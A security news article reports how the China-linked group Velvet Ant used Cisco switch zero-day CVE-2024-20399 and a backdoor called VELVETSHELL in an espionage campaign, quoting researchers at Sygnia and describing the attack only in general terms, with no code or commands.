Chinese Hackers Leverage Zero-Day Cisco Switch Flaw for System Control

August 22, 2024

A cyber threat group with connections to China, referred to as Velvet Ant, has been exploiting a recently disclosed security flaw in Cisco switches, identified as CVE-2024-20399, as a zero-day to gain control and dodge detection. The exploit was observed earlier this year, allowing the group to deliver tailored malware and establish extensive control over the infiltrated system, thereby enabling data theft and maintaining ongoing access.

As cybersecurity firm Sygnia reported, 'The zero-day exploit allows an attacker with valid administrator credentials to the Switch management console to escape the NX-OS command line interface (CLI) and execute arbitrary commands on the Linux underlying operating system.' Velvet Ant was initially identified by researchers at Sygnia due to its multi-year campaign targeting an unnamed organization in East Asia. The group used outdated F5 BIG-IP appliances as a launch point to establish persistence in the compromised environment.

The group's clandestine exploitation of CVE-2024-20399 was revealed last month, leading Cisco to release security updates to rectify the flaw. What stands out is the group's level of sophistication and their ability to adapt their methods, initially infiltrating new Windows systems before transitioning to older Windows servers and network devices to stay unnoticed. Sygnia noted, 'The transition to operating from internal network devices marks yet another escalation in the evasion techniques used in order to ensure the continuation of the espionage campaign.'

The most recent attack sequence involves breaking into a Cisco switch appliance using CVE-2024-20399 and carrying out reconnaissance activities. The group then moves to additional network devices and ultimately runs a backdoor binary via a malicious script. The payload, named VELVETSHELL, combines two open-source tools, a Unix backdoor called Tiny SHell and a proxy utility known as 3proxy. It also possesses capabilities to execute arbitrary commands, download/upload files, and set up tunnels for proxying network traffic.

Sygnia commented on the threat group's methods, stating, 'The modus-operandi of 'Velvet Ant' highlights risks and questions regarding third-party appliances and applications that organizations onboard. Due to the 'black box' nature of many appliances, each piece of hardware or software has the potential to turn into the attack surface that an adversary is able to exploit.'

Related News

• Critical Vulnerability in Cisco SSM On-Prem Allows Hackers to Alter User Passwords
• CISA and FBI Call on Developers to Eliminate OS Command Injection Vulnerabilities
• CISA Includes Cisco NX-OS Command Injection Vulnerability in its Known Exploited Vulnerabilities Catalog
• Cisco Patches NX-OS Zero-Day Exploited by Chinese Threat Actor Velvet Ant

Latest News

• SolarWinds Addresses Critical Vulnerability in Web Help Desk Software
• Google Addresses Ninth Exploited Chrome Zero-Day Vulnerability of 2024
• Styx Stealer's Creator Unmasked Due to Operational Security Error
• Critical Vulnerability in LiteSpeed Cache WordPress Plugin Threatens Millions of Websites
• Critical Authentication Bypass Flaw Detected in GitHub Enterprise Server